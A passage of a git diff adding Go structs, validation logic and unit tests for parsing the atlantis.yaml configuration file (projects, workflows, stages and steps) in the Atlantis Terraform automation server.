+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "invalid key",
+ input: "invalid: key",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 1: field invalid not found in struct raw.Config",
+ },
+ {
+ description: "version set",
+ input: "version: 2",
+ exp: raw.Config{
+ Version: Int(2),
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "projects key without value",
+ input: "projects:",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "workflows key without value",
+ input: "workflows:",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ },
+ {
+ description: "projects with a map",
+ input: "projects:\n key: value",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 2: cannot unmarshal !!map into []raw.Project",
+ },
+ {
+ description: "projects with a scalar",
+ input: "projects: value",
+ exp: raw.Config{
+ Version: nil,
+ Projects: nil,
+ Workflows: nil,
+ },
+ expErr: "yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `value` into []raw.Project",
+ },
+ {
+ description: "should use values if set",
+ input: `
+version: 2
+projects:
+- dir: mydir
+ workspace: myworkspace
+ workflow: default
+ terraform_version: v0.11.0
+ autoplan:
+ enabled: false
+ when_modified: []
+ apply_requirements: [mergeable]
+workflows:
+ default:
+ plan:
+ steps: []
+ apply:
+ steps: []`,
+ exp: raw.Config{
+ Version: Int(2),
+ Projects: []raw.Project{
+ {
+ Dir: String("mydir"),
+ Workspace: String("myworkspace"),
+ Workflow: String("default"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"mergeable"},
+ },
+ },
+ Workflows: map[string]raw.Workflow{
+ "default": {
+ Apply: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var conf raw.Config
+ err := yaml.UnmarshalStrict([]byte(c.input), &conf)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, conf)
+ })
+ }
+}
+
+func TestConfig_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Config
+ expErr string
+ }{
+ {
+ description: "version not nil",
+ input: raw.Config{
+ Version: nil,
+ },
+ expErr: "version: is required. If you've just upgraded Atlantis you need to rewrite your atlantis.yaml for version 2. See www.runatlantis.io/docs/upgrading-atlantis-yaml-to-version-2.html.",
+ },
+ {
+ description: "version not 1",
+ input: raw.Config{
+ Version: Int(1),
+ },
+ expErr: "version: must equal 2.",
+ },
+ }
+ validation.ErrorTag = "yaml"
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ } else {
+ ErrEquals(t, c.expErr, err)
+ }
+ })
+ }
+}
+
+func TestConfig_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Config
+ exp valid.Config
+ }{
+ {
+ description: "nothing set",
+ input: raw.Config{Version: Int(2)},
+ exp: valid.Config{
+ Version: 2,
+ Workflows: make(map[string]valid.Workflow),
+ },
+ },
+ {
+ description: "set to empty",
+ input: raw.Config{
+ Version: Int(2),
+ Workflows: map[string]raw.Workflow{},
+ Projects: []raw.Project{},
+ },
+ exp: valid.Config{
+ Version: 2,
+ Workflows: map[string]valid.Workflow{},
+ Projects: nil,
+ },
+ },
+ {
+ description: "everything set",
+ input: raw.Config{
+ Version: Int(2),
+ Workflows: map[string]raw.Workflow{
+ "myworkflow": {
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("apply"),
+ },
+ },
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ },
+ },
+ Projects: []raw.Project{
+ {
+ Dir: String("mydir"),
+ },
+ },
+ },
+ exp: valid.Config{
+ Version: 2,
+ Workflows: map[string]valid.Workflow{
+ "myworkflow": {
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "apply",
+ },
+ },
+ },
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ Projects: []valid.Project{
+ {
+ Dir: "mydir",
+ Workspace: "default",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
new file mode 100644
index 0000000000..3de10b5320
--- /dev/null
+++ b/server/events/yaml/raw/project.go
@@ -0,0 +1,85 @@
+package raw
+
+import (
+ "fmt"
+ "strings"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+ DefaultWorkspace = "default"
+ ApprovedApplyRequirement = "approved"
+)
+
+type Project struct {
+ Name *string `yaml:"name,omitempty"`
+ Dir *string `yaml:"dir,omitempty"`
+ Workspace *string `yaml:"workspace,omitempty"`
+ Workflow *string `yaml:"workflow,omitempty"`
+ TerraformVersion *string `yaml:"terraform_version,omitempty"`
+ Autoplan *Autoplan `yaml:"autoplan,omitempty"`
+ ApplyRequirements []string `yaml:"apply_requirements,omitempty"`
+}
+
+func (p Project) Validate() error {
+ hasDotDot := func(value interface{}) error {
+ if strings.Contains(*value.(*string), "..") {
+ return errors.New("cannot contain '..'")
+ }
+ return nil
+ }
+ validApplyReq := func(value interface{}) error {
+ reqs := value.([]string)
+ for _, r := range reqs {
+ if r != ApprovedApplyRequirement {
+ return fmt.Errorf("%q not supported, only %s is supported", r, ApprovedApplyRequirement)
+ }
+ }
+ return nil
+ }
+ validTFVersion := func(value interface{}) error {
+ strPtr := value.(*string)
+ if strPtr == nil {
+ return nil
+ }
+ _, err := version.NewVersion(*strPtr)
+ return errors.Wrapf(err, "version %q could not be parsed", *strPtr)
+ }
+ return validation.ValidateStruct(&p,
+ validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)),
+ validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)),
+ validation.Field(&p.TerraformVersion, validation.By(validTFVersion)),
+ )
+}
+
+func (p Project) ToValid() valid.Project {
+ var v valid.Project
+ v.Dir = *p.Dir
+
+ if p.Workspace == nil {
+ v.Workspace = DefaultWorkspace
+ } else {
+ v.Workspace = *p.Workspace
+ }
+
+ v.Workflow = p.Workflow
+ if p.TerraformVersion != nil {
+ v.TerraformVersion, _ = version.NewVersion(*p.TerraformVersion)
+ }
+ if p.Autoplan == nil {
+ v.Autoplan = DefaultAutoPlan()
+ } else {
+ v.Autoplan = p.Autoplan.ToValid()
+ }
+
+ // There are no default apply requirements.
+ v.ApplyRequirements = p.ApplyRequirements
+
+ v.Name = p.Name
+
+ return v
+}
diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go
new file mode 100644
index 0000000000..79f0cf7dbf
--- /dev/null
+++ b/server/events/yaml/raw/project_test.go
@@ -0,0 +1,226 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestProject_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Project
+ }{
+ {
+ description: "omit unset fields",
+ input: "",
+ exp: raw.Project{
+ Dir: nil,
+ Workspace: nil,
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: nil,
+ ApplyRequirements: nil,
+ Name: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+name: myname
+dir: mydir
+workspace: workspace
+workflow: workflow
+terraform_version: v0.11.0
+autoplan:
+ when_modified: []
+ enabled: false
+apply_requirements:
+- mergeable`,
+ exp: raw.Project{
+ Name: String("myname"),
+ Dir: String("mydir"),
+ Workspace: String("workspace"),
+ Workflow: String("workflow"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"mergeable"},
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var p raw.Project
+ err := yaml.UnmarshalStrict([]byte(c.input), &p)
+ Ok(t, err)
+ Equals(t, c.exp, p)
+ })
+ }
+}
+
+func TestProject_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Project
+ expErr string
+ }{
+ {
+ description: "minimal fields",
+ input: raw.Project{
+ Dir: String("."),
+ },
+ expErr: "",
+ },
+ {
+ description: "dir empty",
+ input: raw.Project{
+ Dir: nil,
+ },
+ expErr: "dir: cannot be blank.",
+ },
+ {
+ description: "dir with ..",
+ input: raw.Project{
+ Dir: String("../mydir"),
+ },
+ expErr: "dir: cannot contain '..'.",
+ },
+ {
+ description: "apply reqs with unsupported",
+ input: raw.Project{
+ Dir: String("."),
+ ApplyRequirements: []string{"unsupported"},
+ },
+ expErr: "apply_requirements: \"unsupported\" not supported, only approved is supported.",
+ },
+ {
+ description: "apply reqs with valid",
+ input: raw.Project{
+ Dir: String("."),
+ ApplyRequirements: []string{"approved"},
+ },
+ expErr: "",
+ },
+ {
+ description: "empty tf version string",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String(""),
+ },
+ expErr: "terraform_version: version \"\" could not be parsed: Malformed version: .",
+ },
+ {
+ description: "tf version with v prepended",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("v1"),
+ },
+ expErr: "",
+ },
+ {
+ description: "tf version without prepended",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("1"),
+ },
+ expErr: "",
+ },
+ }
+ validation.ErrorTag = "yaml"
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ } else {
+ ErrEquals(t, c.expErr, err)
+ }
+ })
+ }
+}
+
+func TestProject_ToValid(t *testing.T) {
+ tfVersionPointEleven, _ := version.NewVersion("v0.11.0")
+ cases := []struct {
+ description string
+ input raw.Project
+ exp valid.Project
+ }{
+ {
+ description: "minimal values",
+ input: raw.Project{
+ Dir: String("."),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: nil,
+ Name: nil,
+ },
+ },
+ {
+ description: "all set",
+ input: raw.Project{
+ Dir: String("."),
+ Workspace: String("myworkspace"),
+ Workflow: String("myworkflow"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{"hi"},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myname"),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersionPointEleven,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"hi"},
+ Enabled: false,
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myname"),
+ },
+ },
+ {
+ description: "tf version without 'v'",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("0.11.0"),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ TerraformVersion: tfVersionPointEleven,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go
new file mode 100644
index 0000000000..2c08e6a820
--- /dev/null
+++ b/server/events/yaml/raw/raw.go
@@ -0,0 +1,4 @@
+// Package raw contains the golang representations of the YAML elements
+// supported in atlantis.yaml. The structs here represent the exact data that
+// comes from the file before it is parsed/validated further.
+package raw
diff --git a/server/events/yaml/raw/raw_test.go b/server/events/yaml/raw/raw_test.go
new file mode 100644
index 0000000000..e0f43fac6d
--- /dev/null
+++ b/server/events/yaml/raw/raw_test.go
@@ -0,0 +1,13 @@
+package raw_test
+
+// Bool is a helper routine that allocates a new bool value
+// to store v and returns a pointer to it.
+func Bool(v bool) *bool { return &v }
+
+// Int is a helper routine that allocates a new int value
+// to store v and returns a pointer to it.
+func Int(v int) *int { return &v }
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/server/events/yaml/raw/stage.go b/server/events/yaml/raw/stage.go
new file mode 100644
index 0000000000..67eef1d3be
--- /dev/null
+++ b/server/events/yaml/raw/stage.go
@@ -0,0 +1,26 @@
+package raw
+
+import (
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type Stage struct {
+ Steps []Step `yaml:"steps,omitempty"`
+}
+
+func (s Stage) Validate() error {
+ return validation.ValidateStruct(&s,
+ validation.Field(&s.Steps),
+ )
+}
+
+func (s Stage) ToValid() valid.Stage {
+ var validSteps []valid.Step
+ for _, s := range s.Steps {
+ validSteps = append(validSteps, s.ToValid())
+ }
+ return valid.Stage{
+ Steps: validSteps,
+ }
+}
diff --git a/server/events/yaml/raw/stage_test.go b/server/events/yaml/raw/stage_test.go
new file mode 100644
index 0000000000..245ed2c4f3
--- /dev/null
+++ b/server/events/yaml/raw/stage_test.go
@@ -0,0 +1,103 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestStage_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Stage
+ }{
+ {
+ description: "empty",
+ input: "",
+ exp: raw.Stage{
+ Steps: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+steps: [step1]
+`,
+ exp: raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("step1"),
+ },
+ },
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var a raw.Stage
+ err := yaml.UnmarshalStrict([]byte(c.input), &a)
+ Ok(t, err)
+ Equals(t, c.exp, a)
+ })
+ }
+}
+
+func TestStage_Validate(t *testing.T) {
+ // Should validate each step.
+ s := raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("invalid"),
+ },
+ },
+ }
+ validation.ErrorTag = "yaml"
+ ErrEquals(t, "steps: (0: \"invalid\" is not a valid step type.).", s.Validate())
+
+ // Empty steps should validate.
+ Ok(t, (raw.Stage{}).Validate())
+}
+
+func TestStage_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Stage
+ exp valid.Stage
+ }{
+ {
+ description: "nothing set",
+ input: raw.Stage{},
+ exp: valid.Stage{
+ Steps: nil,
+ },
+ },
+ {
+ description: "fields set",
+ input: raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ exp: valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go
new file mode 100644
index 0000000000..a5b5c633eb
--- /dev/null
+++ b/server/events/yaml/raw/step.go
@@ -0,0 +1,200 @@
+package raw
+
+import (
+ "errors"
+ "fmt"
+ "sort"
+ "strings"
+
+ "github.com/flynn-archive/go-shlex"
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+ ExtraArgsKey = "extra_args"
+ RunStepName = "run"
+ PlanStepName = "plan"
+ ApplyStepName = "apply"
+ InitStepName = "init"
+)
+
+// Step represents a single action/command to perform. In YAML, it can be set as
+// 1. A single string for a built-in command:
+// - init
+// - plan
+// 2. A map for a built-in command and extra_args:
+// - plan:
+// extra_args: [-var-file=staging.tfvars]
+// 3. A map for a custom run command:
+// - run: my custom command
+// Here we parse step in the most generic fashion possible. See fields for more
+// details.
+type Step struct {
+ // Key will be set in case #1 and #3 above to the key. In case #2, there
+ // could be multiple keys (since the element is a map) so we don't set Key.
+ Key *string
+ // Map will be set in case #2 above.
+ Map map[string]map[string][]string
+ // StringVal will be set in case #3 above.
+ StringVal map[string]string
+}
+
+func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error {
+ // First try to unmarshal as a single string, ex.
+ // steps:
+ // - init
+ // - plan
+ // We validate if it's a legal string later.
+ var singleString string
+ err := unmarshal(&singleString)
+ if err == nil {
+ s.Key = &singleString
+ return nil
+ }
+
+ // This represents a step with extra_args, ex:
+ // init:
+ // extra_args: [a, b]
+ // We validate if there's a single key in the map and if the value is a
+ // legal value later.
+ var step map[string]map[string][]string
+ err = unmarshal(&step)
+ if err == nil {
+ s.Map = step
+ return nil
+ }
+
+ // Try to unmarshal as a custom run step, ex.
+ // steps:
+ // - run: my command
+ // We validate if the key is run later.
+ var runStep map[string]string
+ err = unmarshal(&runStep)
+ if err == nil {
+ s.StringVal = runStep
+ return nil
+ }
+
+ return err
+}
+
+func (s Step) Validate() error {
+ validStep := func(value interface{}) error {
+ str := *value.(*string)
+ if str != InitStepName && str != PlanStepName && str != ApplyStepName {
+ return fmt.Errorf("%q is not a valid step type", str)
+ }
+ return nil
+ }
+
+ extraArgs := func(value interface{}) error {
+ elem := value.(map[string]map[string][]string)
+ var keys []string
+ for k := range elem {
+ keys = append(keys, k)
+ }
+ // Sort so tests can be deterministic.
+ sort.Strings(keys)
+
+ if len(keys) > 1 {
+ return fmt.Errorf("step element can only contain a single key, found %d: %s",
+ len(keys), strings.Join(keys, ","))
+ }
+ for stepName, args := range elem {
+ if stepName != InitStepName && stepName != PlanStepName && stepName != ApplyStepName {
+ return fmt.Errorf("%q is not a valid step type", stepName)
+ }
+ var argKeys []string
+ for k := range args {
+ argKeys = append(argKeys, k)
+ }
+
+ // args should contain a single 'extra_args' key.
+ if len(argKeys) > 1 {
+ return fmt.Errorf("built-in steps only support a single %s key, found %d: %s",
+ ExtraArgsKey, len(argKeys), strings.Join(argKeys, ","))
+ }
+ for k := range args {
+ if k != ExtraArgsKey {
+ return fmt.Errorf("built-in steps only support a single %s key, found %q in step %s", ExtraArgsKey, k, stepName)
+ }
+ }
+ }
+ return nil
+ }
+
+ runStep := func(value interface{}) error {
+ elem := value.(map[string]string)
+ var keys []string
+ for k := range elem {
+ keys = append(keys, k)
+ }
+ // Sort so tests can be deterministic.
+ sort.Strings(keys)
+
+ if len(keys) > 1 {
+ return fmt.Errorf("step element can only contain a single key, found %d: %s",
+ len(keys), strings.Join(keys, ","))
+ }
+ for stepName, args := range elem {
+ if stepName != RunStepName {
+ return fmt.Errorf("%q is not a valid step type", stepName)
+ }
+ _, err := shlex.Split(args)
+ if err != nil {
+ return fmt.Errorf("unable to parse as shell command: %s", err)
+ }
+ }
+ return nil
+ }
+
+ if s.Key != nil {
+ return validation.Validate(s.Key, validation.By(validStep))
+ }
+ if len(s.Map) > 0 {
+ return validation.Validate(s.Map, validation.By(extraArgs))
+ }
+ if len(s.StringVal) > 0 {
+ return validation.Validate(s.StringVal, validation.By(runStep))
+ }
+ return errors.New("step element is empty")
+}
+
+func (s Step) ToValid() valid.Step {
+ // This will trigger in case #1 (see Step docs).
+ if s.Key != nil {
+ return valid.Step{
+ StepName: *s.Key,
+ }
+ }
+
+ // This will trigger in case #2 (see Step docs).
+ if len(s.Map) > 0 {
+ // After validation we assume there's only one key and it's a valid
+ // step name so we just use the first one.
+ for stepName, stepArgs := range s.Map {
+ return valid.Step{
+ StepName: stepName,
+ ExtraArgs: stepArgs[ExtraArgsKey],
+ }
+ }
+ }
+
+ // This will trigger in case #3 (see Step docs).
+ if len(s.StringVal) > 0 {
+ // After validation we assume there's only one key and it's a valid
+ // step name so we just use the first one.
+ for _, v := range s.StringVal {
+ // We ignore the error here because it should have been checked in
+ // Validate().
+ split, _ := shlex.Split(v) // nolint: errcheck
+ return valid.Step{
+ StepName: RunStepName,
+ RunCommand: split,
+ }
+ }
+ }
+
+ panic("step was not valid. This is a bug!")
+}
diff --git a/server/events/yaml/raw/step_test.go b/server/events/yaml/raw/step_test.go
new file mode 100644
index 0000000000..ec8a5d4934
--- /dev/null
+++ b/server/events/yaml/raw/step_test.go
@@ -0,0 +1,387 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestStepConfig_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Step
+ expErr string
+ }{
+
+ // Single string.
+ {
+ description: "single string",
+ input: `astring`,
+ exp: raw.Step{
+ Key: String("astring"),
+ },
+ },
+
+ // MapType i.e. extra_args style.
+ {
+ description: "extra_args style",
+ input: `
+key:
+ mapValue: [arg1, arg2]`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "mapValue": {"arg1", "arg2"},
+ },
+ },
+ },
+ },
+ {
+ description: "extra_args style multiple keys",
+ input: `
+key:
+ mapValue: [arg1, arg2]
+ value2: []`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "mapValue": {"arg1", "arg2"},
+ "value2": {},
+ },
+ },
+ },
+ },
+ {
+ description: "extra_args style multiple top-level keys",
+ input: `
+key:
+ val1: []
+key2:
+ val2: []`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "val1": {},
+ },
+ "key2": {
+ "val2": {},
+ },
+ },
+ },
+ },
+
+ // Run-step style
+ {
+ description: "run step",
+ input: `
+run: my command`,
+ exp: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ },
+ },
+ },
+ {
+ description: "run step multiple top-level keys",
+ input: `
+run: my command
+key: value`,
+ exp: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ "key": "value",
+ },
+ },
+ },
+
+ // Empty
+ {
+ description: "empty",
+ input: "",
+ exp: raw.Step{
+ Key: nil,
+ Map: nil,
+ StringVal: nil,
+ },
+ },
+
+ // Errors
+ {
+ description: "extra args style no slice strings",
+ input: `
+key:
+ value:
+ another: map`,
+ expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var got raw.Step
+ err := yaml.UnmarshalStrict([]byte(c.input), &got)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, got)
+ })
+ }
+}
+
+func TestStep_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Step
+ expErr string
+ }{
+ // Valid inputs.
+ {
+ description: "init step",
+ input: raw.Step{
+ Key: String("init"),
+ },
+ expErr: "",
+ },
+ {
+ description: "plan step",
+ input: raw.Step{
+ Key: String("plan"),
+ },
+ expErr: "",
+ },
+ {
+ description: "apply step",
+ input: raw.Step{
+ Key: String("apply"),
+ },
+ expErr: "",
+ },
+ {
+ description: "init extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "plan extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "plan": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "apply extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "apply": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "run step",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ },
+ },
+ expErr: "",
+ },
+
+ // Invalid inputs.
+ {
+ description: "empty elem",
+ input: raw.Step{},
+ expErr: "step element is empty",
+ },
+ {
+ description: "invalid step name",
+ input: raw.Step{
+ Key: String("invalid"),
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "multiple keys in map",
+ input: raw.Step{
+ Map: MapType{
+ "key1": nil,
+ "key2": nil,
+ },
+ },
+ expErr: "step element can only contain a single key, found 2: key1,key2",
+ },
+ {
+ description: "multiple keys in string val",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "key1": "",
+ "key2": "",
+ },
+ },
+ expErr: "step element can only contain a single key, found 2: key1,key2",
+ },
+ {
+ description: "invalid key in map",
+ input: raw.Step{
+ Map: MapType{
+ "invalid": nil,
+ },
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "invalid key in string val",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "invalid": "",
+ },
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "non extra_arg key",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "invalid": nil,
+ },
+ },
+ },
+ expErr: "built-in steps only support a single extra_args key, found \"invalid\" in step init",
+ },
+ {
+ description: "unparseable shell command",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my 'c",
+ },
+ },
+ expErr: "unable to parse as shell command: EOF found when expecting closing quote.",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ return
+ }
+ ErrEquals(t, c.expErr, err)
+ })
+ }
+}
+
+func TestStep_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Step
+ exp valid.Step
+ }{
+ {
+ description: "init step",
+ input: raw.Step{
+ Key: String("init"),
+ },
+ exp: valid.Step{
+ StepName: "init",
+ },
+ },
+ {
+ description: "plan step",
+ input: raw.Step{
+ Key: String("plan"),
+ },
+ exp: valid.Step{
+ StepName: "plan",
+ },
+ },
+ {
+ description: "apply step",
+ input: raw.Step{
+ Key: String("apply"),
+ },
+ exp: valid.Step{
+ StepName: "apply",
+ },
+ },
+ {
+ description: "init extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "init",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "plan extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "plan": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "plan",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "apply extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "apply": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "apply",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "run step",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my 'run command'",
+ },
+ },
+ exp: valid.Step{
+ StepName: "run",
+ RunCommand: []string{"my", "run command"},
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
+
+type MapType map[string]map[string][]string
diff --git a/server/events/yaml/raw/workflow.go b/server/events/yaml/raw/workflow.go
new file mode 100644
index 0000000000..1a6dc73245
--- /dev/null
+++ b/server/events/yaml/raw/workflow.go
@@ -0,0 +1,31 @@
+package raw
+
+import (
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type Workflow struct {
+ Apply *Stage `yaml:"apply,omitempty"`
+ Plan *Stage `yaml:"plan,omitempty"`
+}
+
+func (w Workflow) Validate() error {
+ return validation.ValidateStruct(&w,
+ validation.Field(&w.Apply),
+ validation.Field(&w.Plan),
+ )
+}
+
+func (w Workflow) ToValid() valid.Workflow {
+ var v valid.Workflow
+ if w.Apply != nil {
+ apply := w.Apply.ToValid()
+ v.Apply = &apply
+ }
+ if w.Plan != nil {
+ plan := w.Plan.ToValid()
+ v.Plan = &plan
+ }
+ return v
+}
diff --git a/server/events/yaml/raw/workflow_test.go b/server/events/yaml/raw/workflow_test.go
new file mode 100644
index 0000000000..85320cfaad
--- /dev/null
+++ b/server/events/yaml/raw/workflow_test.go
@@ -0,0 +1,168 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
